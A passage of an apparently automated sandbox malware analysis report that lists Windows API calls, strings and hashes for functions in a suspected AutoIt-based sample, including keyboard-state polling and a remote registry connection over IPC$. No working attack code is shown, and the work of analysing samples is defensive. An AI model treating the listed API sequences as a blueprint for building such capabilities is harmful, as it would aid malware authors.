                        • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                        • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                        • String ID:
                        • API String ID: 228034949-0
                        • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                        • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                        • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                        • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004334F4
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                        • GlobalLock.KERNEL32(00000000), ref: 00433523
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00433533
                        • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                        • CloseHandle.KERNEL32(00000000), ref: 00433541
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0043354F
                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                        • GlobalFree.KERNEL32(00000000), ref: 0043357B
                        • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                        • CopyImage.USER32 ref: 004335DB
                        • DeleteObject.GDI32(?), ref: 00433603
                        • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3969911579-0
                        • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                        • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                        • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                        • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                        APIs
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EF6C
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EF81
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EF94
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EFAB
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EFB8
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EFD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: SendString$_wcslen
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2420728520-1007645807
                        • Opcode ID: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                        • Instruction ID: e5e6e3524f15ee9b53aa238c1547bf14c0af5fa70a1fb0ad50a0449216793e57
                        • Opcode Fuzzy Hash: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
                        • Instruction Fuzzy Hash: F321A53164830476E220FB51DC87F9E7798AB84B14F200D3BBA407A0D1DBA8E94CC76E
                        APIs
                        • GetParent.USER32 ref: 00445A8D
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                        • __wcsicoll.LIBCMT ref: 00445AC4
                        • __wcsicoll.LIBCMT ref: 00445AE0
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wcsicoll$ClassMessageNameParentSend
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 3125838495-3381328864
                        • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                        • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                        • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                        • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CopyVariant$ErrorLast
                        • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                        • API String ID: 2286883814-4206948668
                        • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                        • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                        • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                        • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                        APIs
                          • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?), ref: 0045336E
                          • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                        • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                        • _wcscpy.LIBCMT ref: 00475F18
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                        • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                        • API String ID: 3052893215-4176887700
                        • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                        • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                        • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                        • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                        APIs
                        • StringFromIID.OLE32(?,?), ref: 004582E5
                          • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                          • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • CoTaskMemFree.OLE32(?), ref: 00458335
                        • RegOpenKeyExW.ADVAPI32 ref: 00458351
                        • RegQueryValueExW.ADVAPI32 ref: 00458381
                        • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                        • RegQueryValueExW.ADVAPI32 ref: 004583E8
                        • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                          • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                        • RegCloseKey.ADVAPI32(?), ref: 004584BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                        • String ID: Version$\TypeLib$interface\
                        • API String ID: 656856066-939221531
                        • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                        • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                        • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                        • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                        APIs
                        • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                        • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                        • __swprintf.LIBCMT ref: 0045E6EE
                        • _printf.LIBCMT ref: 0045E7A9
                        • _printf.LIBCMT ref: 0045E7D2
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: LoadString_printf$__swprintf_wcslen
                        • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 3590180749-2354261254
                        • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                        • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                        • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                        • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __swprintf_wcscpy$__i64tow__itow
                        • String ID: %.15g$0x%p$False$True
                        • API String ID: 3038501623-2263619337
                        • Opcode ID: e37f2dde35a19c68239423b8942ea1d02dceb3253fb09795afe5cdfffc0c88a3
                        • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                        • Opcode Fuzzy Hash: e37f2dde35a19c68239423b8942ea1d02dceb3253fb09795afe5cdfffc0c88a3
                        • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                        APIs
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • _memset.LIBCMT ref: 00458194
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                        • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                        • RegOpenKeyExW.ADVAPI32 ref: 00458219
                        • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                        • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                        • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                        • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 2255324689-22481851
                        • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                        • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                        • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                        • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                        APIs
                        • RegOpenKeyExW.ADVAPI32 ref: 00458513
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                        • RegCloseKey.ADVAPI32(?), ref: 00458615
                          • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                        • RegOpenKeyExW.ADVAPI32 ref: 0045858A
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                        • __wcsicoll.LIBCMT ref: 004585D6
                        • IIDFromString.OLE32(?,?), ref: 004585EB
                        • RegCloseKey.ADVAPI32(?), ref: 004585F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                        • String ID: ($interface$interface\
                        • API String ID: 2231185022-3327702407
                        • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                        • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                        • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                        • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                        APIs
                        • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                        • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                        • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                        • _wcscpy.LIBCMT ref: 004365F5
                        • WSACleanup.WSOCK32 ref: 004365FD
                        • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                        • _strcat.LIBCMT ref: 0043662F
                        • _wcscpy.LIBCMT ref: 00436644
                        • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                        • _wcscpy.LIBCMT ref: 00436666
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 2691793716-3771769585
                        • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                        • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                        • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                        • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                        APIs
                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                        • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                          • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                          • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                        • GetProcAddress.KERNEL32(00000000,EncodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B58
                        • GetProcAddress.KERNEL32(00411739,DecodePointer,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B68
                        • __lock.LIBCMT ref: 00416B8A
                        • InterlockedIncrement.KERNEL32(00EA60FF,?,00411739,00417F28,00413979,?,?,00411739), ref: 00416B97
                        • __lock.LIBCMT ref: 00416BAB
                        • ___addlocaleref.LIBCMT ref: 00416BC9
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                        • API String ID: 1028249917-2843748187
                        • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                        • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                        • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                        • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                        APIs
                        • GetSysColorBrush.USER32 ref: 00410326
                        • RegisterClassExW.USER32 ref: 00410359
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                        • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                        • LoadIconW.USER32 ref: 004103B1
                        • ImageList_ReplaceIcon.COMCTL32(0093D8D8,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                        • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                        • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                        • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                        APIs
                        • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                        • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                        • CharNextW.USER32(?), ref: 00449361
                        • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                        • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                        • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$CharNext
                        • String ID:
                        • API String ID: 1350042424-0
                        • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                        • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                        • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                        • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                        APIs
                        • GetKeyboardState.USER32(?), ref: 00453C0D
                        • SetKeyboardState.USER32(?), ref: 00453C5A
                        • GetAsyncKeyState.USER32 ref: 00453C82
                        • GetKeyState.USER32(000000A0), ref: 00453C99
                        • GetAsyncKeyState.USER32 ref: 00453CC9
                        • GetKeyState.USER32(000000A1), ref: 00453CDA
                        • GetAsyncKeyState.USER32 ref: 00453D07
                        • GetKeyState.USER32(00000011), ref: 00453D15
